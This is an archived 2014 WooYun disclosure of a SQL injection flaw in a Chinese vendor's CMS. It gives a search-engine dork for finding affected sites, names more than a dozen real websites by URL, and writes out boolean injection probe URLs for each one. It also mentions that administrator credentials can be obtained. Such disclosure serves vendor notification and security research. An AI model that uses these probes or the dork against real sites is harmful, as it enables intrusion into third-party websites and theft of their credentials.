乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-23: 细节已通知厂商并且等待厂商处理中 2014-09-26: 厂商已经确认,细节仅向厂商公开 2014-09-29: 细节向第三方安全合作伙伴开放 2014-11-20: 细节向核心白帽子及相关领域专家公开 2014-11-30: 细节向普通白帽子公开 2014-12-10: 细节向实习白帽子公开 2014-12-22: 细节向公众公开
某通用型CMS系统存在SQL注入漏洞影响大量网站
受到影响的厂商http://www.z029.com/兆泽网络科技google关键词技术支持:兆泽网络科技inurl:php/WZ_read.php?articid=
受到影响的部分网站
http://www.htgrape.com/php/WZ_read.php?articid=107http://www.xdblq.com/php/WZ_read.php?articid=96http://www.forstar.com.cn/php/news_table.php?id=1242http://www.zryhsx.com/php/WZ_read.php?articid=341http://www.xayzw.com/php/news_read.php?articid=643http://www.xasaihu.com/php/WZ_read.php?articid=262http://www.xaqsw.com/php/wz_read.php?articid=324http://www.laosundajia.com/php/wz_read.php?articid=1485http://www.guangrensi.com/php/WZ_read.php?articid=54http://www.htgrape.com/php/WZ_read.php?articid=109http://www.xasaihu.com/php/WZ_read.php?articid=230http://www.anchensw.com/php/wz_read.php?articid=17http://www.silian.com.cn/php/wz_read.php?id=33http://www.sundagentleman.com/FT/php/wz_read.php?id=121
测试网站均存在注入
http://www.htgrape.com/php/WZ_read.php?articid=107'%20and%20'1'='1http://www.htgrape.com/php/WZ_read.php?articid=107'%20and%20'1'='2http://www.xdblq.com/php/WZ_read.php?articid=92'%20and%20'1'='1http://www.xdblq.com/php/WZ_read.php?articid=92'%20and%20'1'='2http://www.forstar.com.cn/php/news_table.php?id=1242'%20and%20'1'='1http://www.forstar.com.cn/php/news_table.php?id=1242'%20and%20'1'='2http://www.zryhsx.com/php/WZ_read.php?articid=341'%20and%20'1'='1http://www.zryhsx.com/php/WZ_read.php?articid=341'%20and%20'1'='2http://www.xaqsw.com/php/wz_read.php?articid=324'%20and%20'1'='1http://www.xaqsw.com/php/wz_read.php?articid=324'%20and%20'1'='2http://www.xayzw.com/php/news_read.php?articid=643'%20and%20'1'='1http://www.xayzw.com/php/news_read.php?articid=643'%20and%20'1'='2http://www.xasaihu.com/php/WZ_read.php?articid=262'%20and%20'1'='1http://www.xasaihu.com/php/WZ_read.php?articid=262'%20and%20'1'='2http://www.laosundajia.com/php/wz_read.php?articid=1485'%20and%20'1'='1http://www.laosundajia.com/php/wz_read.php?articid=1485'%20and%20'1'='2http://www.sundagentleman.com/FT/php/wz_read.php?id=121'%20and%20'1'='1http://www.sundagentleman.com/FT/php/wz_read.php?id=121'%20and%20'1'='2http://www.silian.com.cn/php/wz_read.php?id=33'%20and%20'1'='1http://www.silian.com.cn/php/wz_read.php?id=33'%20and%20'1'='2http://www.anchensw.com/php/wz_read.php?articid=17'%20and%20'1'='1http://www.anchensw.com/php/wz_read.php?articid=17'%20and%20'1'='2http://www.xasaihu.com/php/WZ_read.php?articid=230'%20and%20'1'='1http://www.xasaihu.com/php/WZ_read.php?articid=230'%20and%20'1'='2http://www.guangrensi.com/php/WZ_read.php?articid=54'%20and%20'1'='1http://www.guangrensi.com/php/WZ_read.php?articid=54'%20and%20'1'='2
还有很多的大量的案例等等
用西安市葡萄研究所测试http://www.htgrape.comhttp://www.htgrape.com/php/WZ_read.php?articid=107
管理员账号或密码
过滤参数
危害等级:高
漏洞Rank:13
确认时间:2014-09-26 14:51
暂无